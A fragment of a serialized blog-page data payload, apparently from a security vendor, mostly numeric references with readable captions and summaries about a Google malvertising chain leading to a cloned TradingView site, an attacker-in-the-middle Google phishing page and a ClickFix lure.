,"nodeType":864},{},[],{"data":32274,"content":32275,"nodeType":883},{"uri":10269},[32276],{"data":32277,"marks":32278,"value":10275,"nodeType":864},{},[32279],{"type":1455},{"data":32281,"marks":32282,"value":19754,"nodeType":864},{},[],{"data":32284,"content":32285,"nodeType":883},{"uri":1700},[32286],{"data":32287,"marks":32288,"value":10299,"nodeType":864},{},[32289],{"type":1455},{"data":32291,"marks":32292,"value":2924,"nodeType":864},{},[],{"items":32294},[32295,32297],{"sys":32296,"name":6593},{"id":6592},{"sys":32298,"name":342},{"id":6596},{"items":32300},[32301],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":32302},{"url":2740},"blog/2025-top-phishing-trends",{"json":32305},{"data":32306,"content":32307,"nodeType":856},{},[32308],{"data":32309,"content":32310,"nodeType":860},{},[32311],{"data":32312,"marks":32313,"value":32314,"nodeType":864},{},[],"Phishing attacks changed a lot through 2025. Here's the top trends from this year and what they mean for security teams heading into 2026. \n",{"id":26564,"publishedAt":32316},"2026-08-12T11:53:25.080Z",{"items":32318},[32319,32321],{"sys":32320,"name":342},{"id":6596},{"sys":32322,"name":6593},{"id":6592},{"items":32324},[32325,32327,32329,32331,32333,32335,32337,32339,32341,32343,32345,32347,32349,32351,32353,32355,32357,32359,32361,32363,32365,32367],{"sys":32326,"name":279,"slug":280,"tier":31},{"id":276},{"sys":32328,"name":413,"slug":414,"tier":31},{"id":410},{"sys":32330,"name":519,"slug":520,"tier":31},{"id":516},{"sys":32332,"name":642,"slug":643,"tier":31},{"id":639},{"sys":32334,"name":342,"slug":343,"tier":31},{"id":339},{"sys":32336,"name":261,"slug":262,"tier":45},{"id":258},{"sys":32338,"name":315,"slug":316,"tier":45},{"id":312},{"sys":32340,"name":324,"slug":325,"tier":45},{"id":321},{"sys":32342,"name":466,"slug":467,"tier":45},{"id":463},{"sys":32344,"name":511,"slug":512,"tier":45},{"id":508},{"sys":32346,"name":440,"slug":441,"tier":45},{"id":437},{"sys":32348,"name":563,"slug":564,"tier":45},{"id":560},{"sys":32350,"name":475,"slug":476,"tier":45},{"id":472},{"sys":32352,"name":607,"slug":608,"tier":45},{"id":604},{"sys":32354,"name":484,"slug":485,"tier":45},{"id":481},{"sys":32356,"name":360,"slug":361,"tier":45},{"id":357},{"sys":32358,"name":288,"slug":289,"tier":45},{"id":285},{"sys":32360,"name":422,"slug":423,"tier":45},{"id":419},{"sys":32362,"name":571,"slug":572,"tier":45},{"id":568},{"sys":32364,"name":431,"slug":432,"tier":45},{"id":428},{"sys":32366,"name":493,"slug":494,"tier":45},{"id":490},{"sys":32368,"name":404,"slug":405,"tier":45},{"id":401},"7YvVxDfBfBbYwky5xPf7erTDCzlAGNd3QktYmRe96W8",{"id":32371,"title":28394,"authorsCollection":32372,"content":32377,"extension":228,"faqItemsCollection":32876,"faqTitle":59,"featured":6,"hashTags":59,"meta":32878,"metaTitle":32879,"ogImage":59,"postType":5740,"publishedDate":28396,"relatedBlogPostsCollection":32880,"slug":28397,"stem":34259,"subtitle":59,"summary":34260,"synopsis":28395,"sys":34271,"tagsCollection":34273,"topicsCollection":34279,"__hash__":34307},"blog/blog/analysing-a-sophisticated-google-malvertising-attack.json",{"items":32373},[32374],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":32375,"profilePicture":32376},[18135],{"url":2740},{"json":32378,"links":32757},{"data":32379,"content":32380,"nodeType":856},{},[32381,32387,32393,32399,32405,32410,32413,32420,32426,32431,32437,32442,32447,32453,32458,32464,32469,32475,32480,32483,32490,32506,32513,32529,32545,32550,32557,32573,32578,32583,32589,32592,32599,32615,32620,32626,32629,32636,32652,32658,32688,32691,32698,32714,32720,32746,32751],{"data":32382,"content":32383,"nodeType":860},{},[32384],{"data":32385,"marks":32386,"value":27979,"nodeType":864},{},[],{"data":32388,"content":32389,"nodeType":860},{},[32390],{"data":32391,"marks":32392,"value":27986,"nodeType":864},{},[],{"data":32394,"content":32395,"nodeType":860},{},[32396],{"data":32397,"marks":32398,"value":27993,"nodeType":864},{},[],{"data":32400,"content":32401,"nodeType":860},{},[32402],{"data":32403,"marks":32404,"value":28000,"nodeType":864},{},[],{"data":32406,"content":32409,"nodeType":996},{"target":32407},{"sys":32408},{"id":28005,"type":1001,"linkType":1002},[],{"data":32411,"content":32412,"nodeType":1005},{},[],{"data":32414,"content":32415,"nodeType":1009},{},[32416],{"data":32417,"marks":32418,"value":20796,"nodeType":864},{},[32419],{"type":899},{"data":32421,"content":32422,"nodeType":860},{},[32423],{"data":32424,"marks":32425,"value":28023,"nodeType":864},{},[],{"data":32427,"content":32430,"nodeType":996},{"target":32428},{"sys":32429},{"id":28028,"type":1001,"linkType":1002},[],{"data":32432,"content":32433,"nodeType":860},{},[32434],{"data":32435,"marks":32436,"value":28036,"nodeType":864},{},[],{"data":32438,"content":32441,"nodeType":996},{"target":32439},{"sys":32440},{"id":28041,"type":1001,"linkType":1002},[],{"data":32443,"content":32446,"nodeType":996},{"target":32444},{"sys":32445},{"id":28047,"type":1001,"linkType":1002},[],{"data":32448,"content":32449,"nodeType":860},{},[32450],{"data":32451,"marks":32452,"value":28055,"nodeType":864},{},[],{"data":32454,"content":32457,"nodeType":996},{"target":32455},{"sys":32456},{"id":28060,"type":1001,"linkType":1002},[],{"data":32459,"content":32460,"nodeType":860},{},[32461],{"data":32462,"marks":32463,"value":28068,"nodeType":864},{},[],{"data":32465,"content":32468,"nodeType":996},{"target":32466},{"sys":32467},{"id":28073,"type":1001,"linkType":1002},[],{"data":32470,"content":32471,"nodeType":860},{},[32472],{"data":32473,"marks":32474,"value":28081,"nodeType":864},{},[],{"data":32476,"content":32479,"nodeType":996},{"target":32477},{"sys":32478},{"id":28086,"type":1001,"linkType":1002},[],{"data":32481,"content":32482,"nodeType":1005},{},[],{"data":32484,"content":32485,"nodeType":1009},{},[32486],{"data":32487,"marks":32488,"value":28098,"nodeType":864},{},[32489],{"type":899},{"data":32491,"content":32492,"nodeType":860},{},[32493,32496,32503],{"data":32494,"marks":32495,"value":28105,"nodeType":864},{},[],{"data":32497,"content":32498,"nodeType":883},{"uri":7124},[32499],{"data":32500,"marks":32501,"value":13810,"nodeType":864},{},[32502],{"type":1455},{"data":32504,"marks":32505,"value":28116,"nodeType":864},{},[],{"data":32507,"content":32508,"nodeType":1312},{},[32509],{"data":32510,"marks":32511,"value":28124,"nodeType":864},{},[32512],{"type":899},{"data":32514,"content":32515,"nodeType":860},{},[32516,32519,32526],{"data":32517,"marks":32518,"value":28131,"nodeType":864},{},[],{"data":32520,"content":32521,"nodeType":883},{"uri":23426},[32522],{"data":32523,"marks":32524,"value":441,"nodeType":864},{},[32525],{"type":1455},{"data":32527,"marks":32528,"value":28142,"nodeType":864},{},[],{"data":32530,"content":32531,"nodeType":860},{},[32532,32535,32542],{"data":32533,"marks":32534,"value":28149,"nodeType":864},{},[],{"data":32536,"content":32537,"nodeType":883},{"uri":6237},[32538],{"data":32539,"marks":32540,"value":6242,"nodeType":864},{},[32541],{"type":1455},{"data":32543,"marks":32544,"value":28160,"nodeType":864},{},[],{"data":32546,"content":32549,"nodeType":996},{"target":32547},{"sys":32548},{"id":28165,"type":1001,"linkType":1002},[],{"data":32551,"content":32552,"nodeType":1312},{},[32553],{"data":32554,"marks":32555,"value":28174,"nodeType":864},{},[32556],{"type":899},{"data":32558,"content":32559,"nodeType":860},{},[32560,32563,32570],{"data":32561,"marks":32562,"value":28181,"nodeType":864},{},[],{"data":32564,"content":32565,"nodeType":883},{"uri":26883},[32566],{"data":32567,"marks":32568,"value":28189,"nodeType":864},{},[32569],{"type":1455},{"data":32571,"marks":32572,"value":28193,"nodeType":864},{},[],{"data":32574,"content":32577,"nodeType":996},{"target":32575},{"sys":32576},{"id":28198,"type":1001,"linkType":1002},[],{"data":32579,"content":32582,"nodeType":996},{"target":32580},{"sys":32581},{"id":28204,"type":1001,"linkType":1002},[],{"data":32584,"content":32585,"nodeType":860},{},[32586],{"data":32587,"marks":32588,"value":28212,"nodeType":864},{},[],{"data":32590,"content":32591,"nodeType":1005},{},[],{"data":32593,"content":32594,"nodeType":1009},{},[32595],{"data":32596,"marks":32597,"value":28223,"nodeType":864},{},[32598],{"type":899},{"data":32600,"content":32601,"nodeType":860},{},[32602,32605,32612],{"data":32603,"marks":32604,"value":21,"nodeType":864},{},[],{"data":32606,"content":32607,"nodeType":883},{"uri":28232},[32608],{"data":32609,"marks":32610,"value":28238,"nodeType":864},{},[32611],{"type":1455},{"data":32613,"marks":32614,"value":28242,"nodeType":864},{},[],{"data":32616,"content":32619,"nodeType":996},{"target":32617},{"sys":32618},{"id":28247,"type":1001,"linkType":1002},[],{"data":32621,"content":32622,"nodeType":860},{},[32623],{"data":32624,"marks":32625,"value":28255,"nodeType":864},{},[],{"data":32627,"content":32628,"nodeType":1005},{},[],{"data":32630,"content":32631,"nodeType":1009},{},[32632],{"data":32633,"marks":32634,"value":5571,"nodeType":864},{},[32635],{"type":899},{"data":32637,"content":32638,"nodeType":860},{},[32639,32642,32649],{"data":32640,"marks":32641,"value":12615,"nodeType":864},{},[],{"data":32643,"content":32644,"nodeType":883},{"uri":7248},[32645],{"data":32646,"marks":32647,"value":7253,"nodeType":864},{},[32648],{"type":1455},{"data":32650,"marks":32651,"value":18496,"nodeType":864},{},[],{"data":32653,"content":32654,"nodeType":860},{},[32655],{"data":32656,"marks":32657,"value":21098,"nodeType":864},{},[],{"data":32659,"content":32660,"nodeType":941},{},[32661,32670,32679],{"data":32662,"content":32663,"nodeType":945},{},[32664],{"data":32665,"content":32666,"nodeType":860},{},[32667],{"data":32668,"marks":32669,"value":28300,"nodeType":864},{},[],{"data":32671,"content":32672,"nodeType":945},{},[32673],{"data":32674,"content":32675,"nodeType":860},{},[32676],{"data":32677,"marks":32678,"value":28310,"nodeType":864},{},[],{"data":32680,"content":32681,"nodeType":945},{},[32682],{"data":32683,"content":32684,"nodeType":860},{},[32685],{"data":32686,"marks":32687,"value":28320,"nodeType":864},{},[],{"data":32689,"content":32690,"nodeType":1005},{},[],{"data":32692,"content":32693,"nodeType":1009},{},[32694],{"data":32695,"marks":32696,"value":21018,"nodeType":864},{},[32697],{"type":899},{"data":32699,"content":32700,"nodeType":860},{},[32701,32704,32711],{"data":32702,"marks":32703,"value":28337,"nodeType":864},{},[],{"data":32705,"content":32706,"nodeType":883},{"uri":7124},[32707],{"data":32708,"marks":32709,"value":28345,"nodeType":864},{},[32710],{"type":1455},{"data":32712,"marks":32713,"value":28349,"nodeType":864},{},[],{"data":32715,"content":32716,"nodeType":860},{},[32717],{"data":32718,"marks":32719,"value":28356,"nodeType":864},{},[],{"data":32721,"content":32722,"nodeType":860},{},[32723,32726,32733,32736,32743],{"data":32724,"marks":32725,"value":16314,"nodeType":864},{},[],{"data":32727,"content":32728,"nodeType":883},{"uri":10269},[32729],{"data":32730,"marks":32731,"value":10275,"nodeType":864},{},[32732],{"type":1455},{"data":32734,"marks":32735,"value":19754,"nodeType":864},{},[],{"data":32737,"content":32738,"nodeType":883},{"uri":1700},[32739],{"data":32740,"marks":32741,"value":10299,"nodeType":864},{},[32742],{"type":1455},{"data":32744,"marks":32745,"value":2924,"nodeType":864},{},[],{"data":32747,"content":32750,"nodeType":996},{"target":32748},{"sys":32749},{"id":27224,"type":1001,"linkType":1002},[],{"data":32752,"content":32753,"nodeType":860},{},[32754],{"data":32755,"marks":32756,"value":21,"nodeType":864},{},[],{"entries":32758},{"hyperlink":32759,"inline":32760,"block":32761},[],[],[32762,32766,32772,32777,32783,32788,32793,32800,32857,32861,32867,32874],{"sys":32763,"__typename":18759,"title":32764,"arcadeDemoUrl":32765,"playText":22447},{"id":28005},"TradingView Malvertising Attack Walkthrough","https://demo.arcade.software/EIVP2emVADsDxut9CZjO?embed",{"sys":32767,"__typename":1724,"title":32768,"caption":32768,"layoutMode":59,"file":32769},{"id":28028},"Initial landing page used as a redirect. This looks similar to many vibe coded sites used by attackers as part of their malvertising and phishing link chains. ",{"url":32770,"width":1736,"height":32771},"https://images.ctfassets.net/y1cdw1ablpvd/2hBe7jYE9VEuAeICiV0yfU/642f74f4212c238e06090c256c9408bf/image5.png",1204,{"sys":32773,"__typename":1724,"title":32774,"caption":32774,"layoutMode":59,"file":32775},{"id":28041},"Cloned TradingView site.",{"url":32776,"width":1736,"height":32771},"https://images.ctfassets.net/y1cdw1ablpvd/71PIYOQpNCGqP35OOeOg44/0823d6231bc3ab492da47436e985025e/image7.png",{"sys":32778,"__typename":1724,"title":32779,"caption":32779,"layoutMode":59,"file":32780},{"id":28047},"The cloned TradingView site is almost identical to the real site.",{"url":32781,"width":1736,"height":32782},"https://images.ctfassets.net/y1cdw1ablpvd/5MLctABFj0A38eIBtaZCAg/b420ac0c7e9b04f55f1b76a80627b373/image8.png",613,{"sys":32784,"__typename":1724,"title":32785,"caption":32785,"layoutMode":59,"file":32786},{"id":28060},"Convincing page prompting the victim to sign in with Google. ",{"url":32787,"width":1736,"height":32771},"https://images.ctfassets.net/y1cdw1ablpvd/1hBfWMM1qhV7rKbwuieCB8/5ce3047801ac23b777fd6ae5ff03d7f4/image4.png",{"sys":32789,"__typename":1724,"title":32790,"caption":32790,"layoutMode":59,"file":32791},{"id":28073},"Attacker-in-the-Middle phishing page targeting Google. ",{"url":32792,"width":1736,"height":32771},"https://images.ctfassets.net/y1cdw1ablpvd/192mknDIa1Cr7uVyjW0msk/ba0c0f272cac424e50ff0ad5a3eeb84e/image3.png",{"sys":32794,"__typename":1724,"title":32795,"caption":32795,"layoutMode":59,"file":32796},{"id":28086},"Push’s timeline of URLs and user actions throughout the phishing attack chain.",{"url":32797,"width":32798,"height":32799},"https://images.ctfassets.net/y1cdw1ablpvd/1JoNJ3qxJgcpXZ4gBI5NeS/f52878e53e7b647e8258f6991b8bfb1d/image6.png",1820,1130,{"sys":32801,"__typename":1740,"content":32802,"name":32856,"title":59},{"id":28165},{"json":32803},{"data":32804,"content":32805,"nodeType":856},{},[32806,32837],{"data":32807,"content":32808,"nodeType":860},{},[32809,32813,32821,32825,32833],{"data":32810,"marks":32811,"value":32812,"nodeType":864},{},[],"We’ve noticed a significant ",{"data":32814,"content":32815,"nodeType":883},{"uri":20714},[32816],{"data":32817,"marks":32818,"value":32820,"nodeType":864},{},[32819],{"type":1455},"increase in malvertising attacks",{"data":32822,"marks":32823,"value":32824,"nodeType":864},{},[]," for the delivery of phishing links, malware downloads, and ClickFix-style attacks (",{"data":32826,"content":32827,"nodeType":883},{"uri":13019},[32828],{"data":32829,"marks":32830,"value":32832,"nodeType":864},{},[32831],{"type":1455},"4 in 5 ClickFix attacks intercepted by Push were delivered via Google Search",{"data":32834,"marks":32835,"value":32836,"nodeType":864},{},[],").",{"data":32838,"content":32839,"nodeType":860},{},[32840,32844,32852],{"data":32841,"marks":32842,"value":32843,"nodeType":864},{},[],"At the same time, ",{"data":32845,"content":32846,"nodeType":883},{"uri":20737},[32847],{"data":32848,"marks":32849,"value":32851,"nodeType":864},{},[32850],{"type":1455},"attacks targeting ad management accounts",{"data":32853,"marks":32854,"value":32855,"nodeType":864},{},[]," used to propagate malicious ads are also on the rise, indicating that this is an area of focus for attackers.","Google malvertising blog insight box 1",{"sys":32858,"__typename":1724,"title":32859,"caption":32859,"layoutMode":59,"file":32860},{"id":28198},"Loading the initial URL directly serves up a benign website rather than redirecting to the next stage in the phishing chain.",{"url":32770,"width":1736,"height":32771},{"sys":32862,"__typename":1724,"title":32863,"caption":32863,"layoutMode":59,"file":32864},{"id":28204},"Attempting to manually load the second site in the phishing chain results in access being denied, where conditional loading parameters are missing.",{"url":32865,"width":1736,"height":32866},"https://images.ctfassets.net/y1cdw1ablpvd/16FOwZxxctoxktnsj9y0Rk/35de320ebb1163758bfa899020766b88/image2.png",1095,{"sys":32868,"__typename":1724,"title":32869,"caption":32869,"layoutMode":59,"file":32870},{"id":28247},"TradingView ClickFix lure reported by Bleeping Computer.",{"url":32871,"width":32872,"height":32873},"https://images.ctfassets.net/y1cdw1ablpvd/5aQwcuSaJTqHma3pOPoijI/14515ddb907526c8d2867275f3f4e164/image1.png",688,525,{"sys":32875,"__typename":1717,"type":1718,"ctaText":30103,"buttonLabel":1720,"buttonColour":1721,"buttonUrl":30037},{"id":27224},{"items":32877},[],{},"Analysing a sophisticated Google malvertising attack",{"items":32881},[32882,33230,33750],{"__typename":2059,"sys":32883,"content":32884,"title":28782,"synopsis":28783,"hashTags":59,"publishedDate":28784,"slug":28785,"tagsCollection":33220,"authorsCollection":33226},{"id":28410},{"json":32885},{"data":32886,"content":32887,"nodeType":856},{},[32888,32895,32901,32906,32912,32942,32948,32953,32959,32964,32969,32974,32979,32984,32987,32994,33000,33006,33012,33019,33024,33040,33046,33062,33067,33070,33077,33083,33149,33155,33158,33165,33171,33177,33183,33209,33214],{"data":32889,"content":32890,"nodeType":1009},{},[32891],{"data":32892,"marks":32893,"value":20796,"nodeType":864},{},[32894],{"type":899},{"data":32896,"content":32897,"nodeType":860},{},[32898],{"data":32899,"marks":32900,"value":28428,"nodeType":864},{},[],{"data":32902,"content":32905,"nodeType":996},{"target":32903},{"sys":32904},{"id":28433,"type":1001,"linkType":1002},[],{"data":32907,"content":32908,"nodeType":860},{},[32909],{"data":32910,"marks":32911,"value":28441,"nodeType":864},{},[],{"data":32913,"content":32914,"nodeType":941},{},[32915,32924,32933],{"data":32916,"content":32917,"nodeType":945},{},[32918],{"data":32919,"content":32920,"nodeType":860},{},[32921],{"data":32922,"marks":32923,"value":28454,"nodeType":864},{},[],{"data":32925,"content":32926,"nodeType":945},{},[32927],{"data":32928,"content":32929,"nodeType":860},{},[32930],{"data":32931,"marks":32932,"value":28464,"nodeType":864},{},[],{"data":32934,"content":32935,"nodeType":945},{},[32936],{"data":32937,"content":32938,"nodeType":860},{},[32939],{"data":32940,"marks":32941,"value":28474,"nodeType":864},{},[],{"data":32943,"content":32944,"nodeType":860},{},[32945],{"data":32946,"marks":32947,"value":28481,"nodeType":864},{},[],{"data":32949,"content":32952,"nodeType":996},{"target":32950},{"sys":32951},{"id":28486,"type":1001,"linkType":1002},[],{"data":32954,"content":32955,"nodeType":860},{},[32956],{"data":32957,"marks":32958,"value":28494,"nodeType":864},{},[],{"data":32960,"content":32963,"nodeType":996},{"target":32961},{"sys":32962},{"id":28499,"type":1001,"linkType":1002},[],{"data":32965,"content":32968,"nodeType":996},{"target":32966},{"sys":32967},{"id":28505,"type":1001,"linkType":1002},[],{"data":32970,"content":32973,"nodeType":996},{"target":32971},{"sys":32972},{"id":28511,"type":1001,"linkType":1002},[],{"data":32975,"content":32978,"nodeType":996},{"target":32976},{"sys":32977},{"id":28517,"type":1001,"linkType":1002},[],{"data":32980,"content":32983,"nodeType":996},{"target":32981},{"sys":32982},{"id":28523,"type":1001,"linkType":1002},[],{"data":32985,"content":32986,"nodeType":1005},{},[],{"data":32988,"content":32989,"nodeType":1009},{},[32990],{"data":32991,"marks":32992,"value":28535,"nodeType":864},{},[32993],{"type":899},{"data":32995,"content":32996,"nodeType":860},{},[32997],{"data":32998,"marks":32999,"value":28542,"nodeType":864},{},[],{"data":33001,"content":33002,"nodeType":860},{},[33003],{"data":33004,"marks":33005,"value":28549,"nodeType":864},{},[],{"data":33007,"content":33008,"nodeType":860},{},[33009],{"data":33010,"marks":33011,"value":28556,"nodeType":864},{},[],{"data":33013,"content":33014,"nodeType":860},{},[33015],{"data":33016,"marks":33017,"value":28564,"nodeType":864},{},[33018],{"type":899},{"data":33020,"content":33023,"nodeType":996},{"target":33021},{"sys":33022},{"id":28569,"type":1001,"linkType":1002},[],{"data":33025,"content":33026,"nodeType":860},{},[33027,33030,33037],{"data":33028,"marks":33029,"value":28577,"nodeType":864},{},[],{"data":33031,"content":33032,"nodeType":883},{"uri":13019},[33033],{"data":33034,"marks":33035,"value":315,"nodeType":864},{},[33036],{"type":1455},{"data":33038,"marks":33039,"value":28588,"nodeType":864},{},[],{"data":33041,"content":33042,"nodeType":860},{},[33043],{"data":33044,"marks":33045,"value":28595,"nodeType":864},{},[],{"data":33047,"content":33048,"nodeType":860},{},[33049,33052,33059],{"data":33050,"marks":33051,"value":28602,"nodeType":864},{},[],{"data":33053,"content":33054,"nodeType":883},{"uri":6237},[33055],{"data":33056,"marks":33057,"value":6242,"nodeType":864},{},[33058],{"type":1455},{"data":33060,"marks":33061,"value":28160,"nodeType":864},{},[],{"data":33063,"content":33066,"nodeType":996},{"target":33064},{"sys":33065},{"id":27224,"type":1001,"linkType":1002},[],{"data":33068,"content":33069,"nodeType":1005},{},[],{"data":33071,"content":33072,"nodeType":1009},{},[33073],{"data":33074,"marks":33075,"value":5571,"nodeType":864},{},[33076],{"type":899},{"data":33078,"content":33079,"nodeType":860},{},[33080],{"data":33081,"marks":33082,"value":28634,"nodeType":864},{},[],{"data":33084,"content":33085,"nodeType":941},{},[33086,33095,33104,33113,33122,33131,33140],{"data":33087,"content":33088,"nodeType":945},{},[33089],{"data":33090,"content":33091,"nodeType":860},{},[33092],{"data":33093,"marks":33094,"value":28647,"nodeType":864},{},[],{"data":33096,"content":33097,"nodeType":945},{},[33098],{"data":33099,"content":33100,"nodeType":860},{},[33101],{"data":33102,"marks":33103,"value":28657,"nodeType":864},{},[],{"data":33105,"content":33106,"nodeType":945},{},[33107],{"data":33108,"content":33109,"nodeType":860},{},[33110],{"data":33111,"marks":33112,"value":28667,"nodeType":864},{},[],{"data":33114,"content":33115,"nodeType":945},{},[33116],{"data":33117,"content":33118,"nodeType":860},{},[33119],{"data":33120,"marks":33121,"value":28677,"nodeType":864},{},[],{"data":33123,"content":33124,"nodeType":945},{},[33125],{"data":33126,"content":33127,"nodeType":860},{},[33128],{"data":33129,"marks":33130,"value":28687,"nodeType":864},{},[],{"data":33132,"content":33133,"nodeType":945},{},[33134],{"data":33135,"content":33136,"nodeType":860},{},[33137],{"data":33138,"marks":33139,"value":28697,"nodeType":864},{},[],{"data":33141,"content":33142,"nodeType":945},{},[33143],{"data":33144,"content":33145,"nodeType":860},{},[33146],{"data":33147,"marks":33148,"value":28707,"nodeType":864},{},[],{"data":33150,"content":33151,"nodeType":860},{},[33152],{"data":33153,"marks":33154,"value":28714,"nodeType":864},{},[],{"data":33156,"content":33157,"nodeType":1005},{},[],{"data":33159,"content":33160,"nodeType":1009},{},[33161],{"data":33162,"marks":33163,"value":21018,"nodeType":864},{},[33164],{"type":899},{"data":33166,"content":33167,"nodeType":860},{},[33168],{"data":33169,"marks":33170,"value":28731,"nodeType":864},{},[],{"data":33172,"content":33173,"nodeType":860},{},[33174],{"data":33175,"marks":33176,"value":28738,"nodeType":864},{},[],{"data":33178,"content":33179,"nodeType":860},{},[33180],{"data":33181,"marks":33182,"value":21039,"nodeType":864},{},[],{"data":33184,"content":33185,"nodeType":860},{},[33186,33189,33196,33199,33206],{"data":33187,"marks":33188,"value":16314,"nodeType":864},{},[],{"data":33190,"content":33191,"nodeType":883},{"uri":10269},[33192],{"data":33193,"marks":33194,"value":10275,"nodeType":864},{},[33195],{"type":1455},{"data":33197,"marks":33198,"value":19754,"nodeType":864},{},[],{"data":33200,"content":33201,"nodeType":883},{"uri":1700},[33202],{"data":33203,"marks":33204,"value":10299,"nodeType":864},{},[33205],{"type":1455},{"data":33207,"marks":33208,"value":2924,"nodeType":864},{},[],{"data":33210,"content":33213,"nodeType":996},{"target":33211},{"sys":33212},{"id":27224,"type":1001,"linkType":1002},[],{"data":33215,"content":33216,"nodeType":860},{},[33217],{"data":33218,"marks":33219,"value":21,"nodeType":864},{},[],{"items":33221},[33222,33224],{"sys":33223,"name":342},{"id":6596},{"sys":33225,"name":6593},{"id":6592},{"items":33227},[33228],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":33229},{"url":2740},{"__typename":2059,"sys":33231,"content":33232,"title":29375,"synopsis":29376,"hashTags":59,"publishedDate":28784,"slug":29377,"tagsCollection":33740,"authorsCollection":33746},{"id":28798},{"json":33233},{"data":33234,"content":33235,"nodeType":856},{},[33236,33242,33248,33254,33259,33265,33268,33275,33281,33287,33293,33298,33304,33309,33315,33320,33326,33331,33357,33363,33368,33374,33379,33385,33390,33396,33435,33438,33445,33451,33457,33463,33468,33471,33478,33484,33500,33505,33510,33515,33521,33526,33531,33547,33550,33557,33573,33578,33584,33600,33607,33613,33619,33625,33641,33648,33654,33659,33662,33669,33675,33681,33684,33691,33697,33703,33729,33734],{"data":33237,"content":33238,"nodeType":860},{},[33239],{"data":33240,"marks":33241,"value":28809,"nodeType":864},{},[],{"data":33243,"content":33244,"nodeType":860},{},[33245],{"data":33246,"marks":33247,"value":28816,"nodeType":864},{},[],{"data":33249,"content":33250,"nodeType":860},{},[33251],{"data":33252,"marks":33253,"value":28823,"nodeType":864},{},[],{"data":33255,"content":33258,"nodeType":996},{"target":33256},{"sys":33257},{"id":28828,"type":1001,"linkType":1002},[],{"data":33260,"content":33261,"nodeType":860},{},[33262],{"data":33263,"marks":33264,"value":28836,"nodeType":864},{},[],{"data":33266,"content":33267,"nodeType":1005},{},[],{"data":33269,"content":33270,"nodeType":1009},{},[33271],{"data":33272,"marks":33273,"value":28847,"nodeType":864},{},[33274],{"type":899},{"data":33276,"content":33277,"nodeType":860},{},[33278],{"data":33279,"marks":33280,"value":28854,"nodeType":864},{},[],{"data":33282,"content":33283,"nodeType":860},{},[33284],{"data":33285,"marks":33286,"value":28861,"nodeType":864},{},[],{"data":33288,"content":33289,"nodeType":860},{},[33290],{"data":33291,"marks":33292,"value":28868,"nodeType":864},{},[],{"data":33294,"content":33297,"nodeType":996},{"target":33295},{"sys":33296},{"id":28873,"type":1001,"linkType":1002},[],{"data":33299,"content":33300,"nodeType":860},{},[33301],{"data":33302,"marks":33303,"value":28881,"nodeType":864},{},[],{"data":33305,"content":33308,"nodeType":996},{"target":33306},{"sys":33307},{"id":28886,"type":1001,"linkType":1002},[],{"data":33310,"content":33311,"nodeType":860},{},[33312],{"data":33313,"marks":33314,"value":28894,"nodeType":864},{},[],{"data":33316,"content":33319,"nodeType":996},{"target":33317},{"sys":33318},{"id":28899,"type":1001,"linkType":1002},[],{"data":33321,"content":33322,"nodeType":860},{},[33323],{"data":33324,"marks":33325,"value":28907,"nodeType":864},{},[],{"data":33327,"content":33330,"nodeType":996},{"target":33328},{"sys":33329},{"id":28912,"type":1001,"linkType":1002},[],{"data":33332,"content":33333,"nodeType":860},{},[33334,33337,33344,33347,33354],{"data":33335,"marks":33336,"value":28920,"nodeType":864},{},[],{"data":33338,"content":33339,"nodeType":883},{"uri":26883},[33340],{"data":33341,"marks":33342,"value":28928,"nodeType":864},{},[33343],{"type":1455},{"data":33345,"marks":33346,"value":28932,"nodeType":864},{},[],{"data":33348,"content":33349,"nodeType":883},{"uri":7124},[33350],{"data":33351,"marks":33352,"value":7129,"nodeType":864},{},[33353],{"type":1455},{"data":33355,"marks":33356,"value":28943,"nodeType":864},{},[],{"data":33358,"content":33359,"nodeType":860},{},[33360],{"data":33361,"marks":33362,"value":28950,"nodeType":864},{},[],{"data":33364,"content":33367,"nodeType":996},{"target":33365},{"sys":33366},{"id":28955,"type":1001,"linkType":1002},[],{"data":33369,"content":33370,"nodeType":860},{},[33371],{"data":33372,"marks":33373,"value":28963,"nodeType":864},{},[],{"data":33375,"content":33378,"nodeType":996},{"target":33376},{"sys":33377},{"id":28968,"type":1001,"linkType":1002},[],{"data":33380,"content":33381,"nodeType":860},{},[33382],{"data":33383,"marks":33384,"value":28976,"nodeType":864},{},[],{"data":33386,"content":33389,"nodeType":996},{"target":33387},{"sys":33388},{"id":28981,"type":1001,"linkType":1002},[],{"data":33391,"content":33392,"nodeType":860},{},[33393],{"data":33394,"marks":33395,"value":28989,"nodeType":864},{},[],{"data":33397,"content":33398,"nodeType":941},{},[33399,33408,33417,33426],{"data":33400,"content":33401,"nodeType":945},{},[33402],{"data":33403,"content":33404,"nodeType":860},{},[33405],{"data":33406,"marks":33407,"value":29002,"nodeType":864},{},[],{"data":33409,"content":33410,"nodeType":945},{},[33411],{"data":33412,"content":33413,"nodeType":860},{},[33414],{"data":33415,"marks":33416,"value":29012,"nodeType":864},{},[],{"data":33418,"content":33419,"nodeType":945},{},[33420],{"data":33421,"content":33422,"nodeType":860},{},[33423],{"data":33424,"marks":33425,"value":29022,"nodeType":864},{},[],{"data":33427,"content":33428,"nodeType":945},{},[33429],{"data":33430,"content":33431,"nodeType":860},{},[33432],{"data":33433,"marks":33434,"value":29032,"nodeType":864},{},[],{"data":33436,"content":33437,"nodeType":1005},{},[],{"data":33439,"content":33440,"nodeType":1009},{},[33441],{"data":33442,"marks":33443,"value":29043,"nodeType":864},{},[33444],{"type":899},{"data":33446,"content":33447,"nodeType":860},{},[33448],{"data":33449,"marks":33450,"value":29050,"nodeType":864},{},[],{"data":33452,"content":33453,"nodeType":860},{},[33454],{"data":33455,"marks":33456,"value":29057,"nodeType":864},{},[],{"data":33458,"content":33459,"nodeType":860},{},[33460],{"data":33461,"marks":33462,"value":29064,"nodeType":864},{},[],{"data":33464,"content":33467,"nodeType":996},{"target":33465},{"sys":33466},{"id":29069,"type":1001,"linkType":1002},[],{"data":33469,"content":33470,"nodeType":1005},{},[],{"data":33472,"content":33473,"nodeType":1009},{},[33474],{"data":33475,"marks":33476,"value":29081,"nodeType":864},{},[33477],{"type":899},{"data":33479,"content":33480,"nodeType":860},{},[33481],{"data":33482,"marks":33483,"value":29088,"nodeType":864},{},[],{"data":33485,"content":33486,"nodeType":860},{},[33487,33490,33497],{"data":33488,"marks":33489,"value":29095,"nodeType":864},{},[],{"data":33491,"content":33492,"nodeType":883},{"uri":29098},[33493],{"data":33494,"marks":33495,"value":29104,"nodeType":864},{},[33496],{"type":1455},{"data":33498,